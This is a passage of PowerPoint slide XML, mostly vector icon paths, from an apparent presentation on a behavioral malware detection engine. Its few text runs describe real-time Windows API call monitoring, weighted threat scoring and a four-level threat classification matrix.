                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="395079" y="0"/>
                  <a:pt x="410390" y="15311"/>
                  <a:pt x="410390" y="34198"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="410390" y="376192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="410390" y="395079"/>
                  <a:pt x="395079" y="410390"/>
                  <a:pt x="376192" y="410390"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34198" y="410390"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15311" y="410390"/>
                  <a:pt x="0" y="395079"/>
                  <a:pt x="0" y="376192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="34198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15324"/>
                  <a:pt x="15324" y="0"/>
                  <a:pt x="34198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Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649784" y="3471215"/>
            <a:ext cx="205195" cy="205195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="205195" h="205195">
                <a:moveTo>
                  <a:pt x="70536" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="59915" y="0"/>
                  <a:pt x="51299" y="8617"/>
                  <a:pt x="51299" y="19237"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="51299" y="102597"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51299" y="113218"/>
                  <a:pt x="59915" y="121835"/>
                  <a:pt x="70536" y="121835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96185" y="121835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106806" y="121835"/>
                  <a:pt x="115422" y="113218"/>
                  <a:pt x="115422" y="102597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="115422" y="76948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128247" y="76948"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="156581" y="76948"/>
                  <a:pt x="179546" y="99912"/>
                  <a:pt x="179546" y="128247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179546" y="156581"/>
                  <a:pt x="156581" y="179546"/>
                  <a:pt x="128247" y="179546"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12825" y="179546"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5731" y="179546"/>
                  <a:pt x="0" y="185277"/>
                  <a:pt x="0" y="192370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="199464"/>
                  <a:pt x="5731" y="205195"/>
                  <a:pt x="12825" y="205195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192370" y="205195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="199464" y="205195"/>
                  <a:pt x="205195" y="199464"/>
                  <a:pt x="205195" y="192370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="185277"/>
                  <a:pt x="199464" y="179546"/>
                  <a:pt x="192370" y="179546"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="185597" y="179546"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="197781" y="165919"/>
                  <a:pt x="205195" y="147965"/>
                  <a:pt x="205195" y="128247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="85765"/>
                  <a:pt x="170729" y="51299"/>
                  <a:pt x="128247" y="51299"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="115422" y="51299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115422" y="19237"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="115422" y="8617"/>
                  <a:pt x="106806" y="0"/>
                  <a:pt x="96185" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70536" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="48093" y="141072"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="42762" y="141072"/>
                  <a:pt x="38474" y="145360"/>
                  <a:pt x="38474" y="150690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38474" y="156020"/>
                  <a:pt x="42762" y="160309"/>
                  <a:pt x="48093" y="160309"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="118628" y="160309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="123959" y="160309"/>
                  <a:pt x="128247" y="156020"/>
                  <a:pt x="128247" y="150690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128247" y="145360"/>
                  <a:pt x="123959" y="141072"/>
                  <a:pt x="118628" y="141072"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48093" y="141072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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094373" y="3368617"/>
            <a:ext cx="4813532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Monitoring Methodology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094373" y="3676410"/>
            <a:ext cx="4796432" cy="8891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7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Our approach monitors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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Windows API calls in real-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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analyzing call sequences, frequency patterns, and cross-process interactions. The engine correlates seemingly benign individual calls to identify malicious behavioral chains that indicate sophisticated malware operations.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59091" y="4873380"/>
            <a:ext cx="5634311" cy="1538962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5634311" h="1538962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5634311" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634311" y="1538962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538962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8" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359091" y="4873380"/>
            <a:ext cx="34199" cy="1538962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="1538962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="1538962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1538962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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547187" y="5044376"/>
            <a:ext cx="410390" cy="410390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="410390" h="410390">
                <a:moveTo>
                  <a:pt x="34198" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="376192" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="395079" y="0"/>
                  <a:pt x="410390" y="15311"/>
                  <a:pt x="410390" y="34198"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="410390" y="376192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="410390" y="395079"/>
                  <a:pt x="395079" y="410390"/>
                  <a:pt x="376192" y="410390"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34198" y="410390"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15311" y="410390"/>
                  <a:pt x="0" y="395079"/>
                  <a:pt x="0" y="376192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="34198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15324"/>
                  <a:pt x="15324" y="0"/>
                  <a:pt x="34198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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649784" y="5146973"/>
            <a:ext cx="205195" cy="205195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="205195" h="205195">
                <a:moveTo>
                  <a:pt x="25649" y="25649"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="25649" y="18556"/>
                  <a:pt x="19918" y="12825"/>
                  <a:pt x="12825" y="12825"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5731" y="12825"/>
                  <a:pt x="0" y="18556"/>
                  <a:pt x="0" y="25649"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="160309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="178023"/>
                  <a:pt x="14348" y="192370"/>
                  <a:pt x="32062" y="192370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="192370" y="192370"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="199464" y="192370"/>
                  <a:pt x="205195" y="186639"/>
                  <a:pt x="205195" y="179546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="172452"/>
                  <a:pt x="199464" y="166721"/>
                  <a:pt x="192370" y="166721"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32062" y="166721"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="28535" y="166721"/>
                  <a:pt x="25649" y="163835"/>
                  <a:pt x="25649" y="160309"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25649" y="25649"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="188603" y="60356"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="193613" y="55347"/>
                  <a:pt x="193613" y="47211"/>
                  <a:pt x="188603" y="42201"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183593" y="37192"/>
                  <a:pt x="175458" y="37192"/>
                  <a:pt x="170448" y="42201"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="128247" y="84443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105243" y="61478"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100233" y="56469"/>
                  <a:pt x="92097" y="56469"/>
                  <a:pt x="87088" y="61478"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48614" y="99952"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="43604" y="104962"/>
                  <a:pt x="43604" y="113098"/>
                  <a:pt x="48614" y="118107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53623" y="123117"/>
                  <a:pt x="61759" y="123117"/>
                  <a:pt x="66769" y="118107"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96185" y="88691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119189" y="111695"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="124199" y="116705"/>
                  <a:pt x="132335" y="116705"/>
                  <a:pt x="137344" y="111695"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="188643" y="60396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Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094373" y="5044376"/>
            <a:ext cx="4813532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4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Pattern Recognition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1094373" y="5352168"/>
            <a:ext cx="4796432" cy="8891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77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system employs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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weighted scoring algorithms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1077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that assign severity levels to individual indicators and calculate composite threat scores. This enables accurate classification of threats into discrete levels: LOW, MEDIUM, HIGH, and CRITICAL.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6201056" y="1302988"/>
            <a:ext cx="5641151" cy="2503378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5641151" h="2503378">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5641151" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5641151" y="2503378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2503378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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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4" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401121" y="1511496"/>
            <a:ext cx="205195" cy="205195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="205195" h="205195">
                <a:moveTo>
                  <a:pt x="93179" y="2084"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="99151" y="-681"/>
                  <a:pt x="106044" y="-681"/>
                  <a:pt x="112016" y="2084"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="199624" y="42562"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="203031" y="44125"/>
                  <a:pt x="205195" y="47531"/>
                  <a:pt x="205195" y="51299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="55066"/>
                  <a:pt x="203031" y="58473"/>
                  <a:pt x="199624" y="60036"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112016" y="100513"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106044" y="103279"/>
                  <a:pt x="99151" y="103279"/>
                  <a:pt x="93179" y="100513"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5571" y="60036"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2164" y="58432"/>
                  <a:pt x="0" y="55026"/>
                  <a:pt x="0" y="51299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="47572"/>
                  <a:pt x="2164" y="44125"/>
                  <a:pt x="5571" y="42562"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="93179" y="2084"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19277" y="87528"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="85124" y="117947"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96225" y="123077"/>
                  <a:pt x="109010" y="123077"/>
                  <a:pt x="120111" y="117947"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="185958" y="87528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199624" y="93861"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="203031" y="95424"/>
                  <a:pt x="205195" y="98830"/>
                  <a:pt x="205195" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205195" y="106365"/>
                  <a:pt x="203031" y="109771"/>
                  <a:pt x="199624" y="111334"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112016" y="151812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106044" y="154578"/>
                  <a:pt x="99151" y="154578"/>
                  <a:pt x="93179" y="151812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5571" y="111334"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2164" y="109731"/>
                  <a:pt x="0" y="106325"/>
                  <a:pt x="0" y="102597"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="98870"/>
                  <a:pt x="2164" y="95424"/>
                  <a:pt x="5571" y="93861"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19237" y="87528"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5571" y="145159"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19237" y="138827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85084" y="169246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="96185" y="174376"/>
                  <a:pt x="108970" y="174376"/>
                  <a:pt x="120071" y="169246"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="185918" y="138827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199584" y="145159"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="202991" y="146722"/>
                  <a:pt x="205155" y="150129"/>
                  <a:pt x="205155" y="153896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205155" y="157663"/>
                  <a:pt x="202991" y="161070"/>
                  <a:pt x="199584" y="162633"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111976" y="203111"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106004" y="205876"/>
                  <a:pt x="99111" y="205876"/>
                  <a:pt x="93139" y="203111"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5571" y="162633"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2164" y="161030"/>
                  <a:pt x="0" y="157623"/>
                  <a:pt x="0" y="153896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="150169"/>
                  <a:pt x="2164" y="146722"/>
                  <a:pt x="5571" y="145159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Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631965" y="1477404"/>
            <a:ext cx="5138424" cy="2735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Threat Classification Matrix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92571" y="1887686"/>
            <a:ext cx="2582036" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2582036" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2582036" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582036" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82078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7" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392571" y="1887686"/>
            <a:ext cx="34199" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00C95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Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546467" y="2058682"/>
            <a:ext cx="427489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05DF7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LOW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271921" y="2024483"/>
            <a:ext cx="692533" cy="3077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20" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="05DF72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0-25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546467" y="2400674"/>
            <a:ext cx="2351192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Minimal risk, legitimate software behavior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9091206" y="1887686"/>
            <a:ext cx="2582036" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2582036" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2582036" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582036" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82078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Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9091206" y="1887686"/>
            <a:ext cx="34199" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F0B10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Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245102" y="2058682"/>
            <a:ext cx="701083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FDC7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MEDIUM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0817301" y="2024483"/>
            <a:ext cx="846429" cy="3077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20" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FDC7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26-50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245102" y="2400674"/>
            <a:ext cx="2351192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Suspicious patterns requiring monitoring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392571" y="2811064"/>
            <a:ext cx="2582036" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2582036" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2582036" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582036" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82078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7" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392571" y="2811064"/>
            <a:ext cx="34199" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF690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8" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546467" y="2982060"/>
            <a:ext cx="453139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FF890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202882" y="2947860"/>
            <a:ext cx="760931" cy="3077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20" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF890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51-75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546467" y="3324051"/>
            <a:ext cx="2351192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Malicious behavior, immediate investigation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9091206" y="2811064"/>
            <a:ext cx="2582036" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2582036" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2582036" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582036" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82078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2" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9091206" y="2811064"/>
            <a:ext cx="34199" cy="820780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="820780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FB2C3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3" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245102" y="2982060"/>
            <a:ext cx="743832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FF646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0716520" y="2947860"/>
            <a:ext cx="949027" cy="3077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020" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF646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76-100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9245102" y="3324051"/>
            <a:ext cx="2351192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42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Active threat, containment required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214735" y="3946476"/>
            <a:ext cx="5634311" cy="2932578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5634311" h="2932578">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5634311" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634311" y="2932578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2932578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7" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6214735" y="3946476"/>
            <a:ext cx="34199" cy="2932578"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34199" h="2932578">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34199" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34199" y="2932578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2932578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8" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428480" y="4151565"/>
            <a:ext cx="205195" cy="205195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="205195" h="205195">
                <a:moveTo>
                  <a:pt x="48093" y="22443"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48093" y="10059"/>
                  <a:pt x="58152" y="0"/>
                  <a:pt x="70536" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80154" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="87248" y="0"/>
                  <a:pt x="92979" y="5731"/>
                  <a:pt x="92979" y="12825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="92979" y="192370"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92979" y="199464"/>
                  <a:pt x="87248" y="205195"/>
                  <a:pt x="80154" y="205195"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="67330" y="205195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55387" y="205195"/>
                  <a:pt x="45327" y="197019"/>
                  <a:pt x="42482" y="185958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42201" y="185958"/>
                  <a:pt x="41961" y="185958"/>
                  <a:pt x="41680" y="185958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23966" y="185958"/>
                  <a:pt x="9619" y="171610"/>
                  <a:pt x="9619" y="153896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9619" y="146682"/>
                  <a:pt x="12023" y="140030"/>
                  <a:pt x="16031" y="134659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8256" y="128808"/>
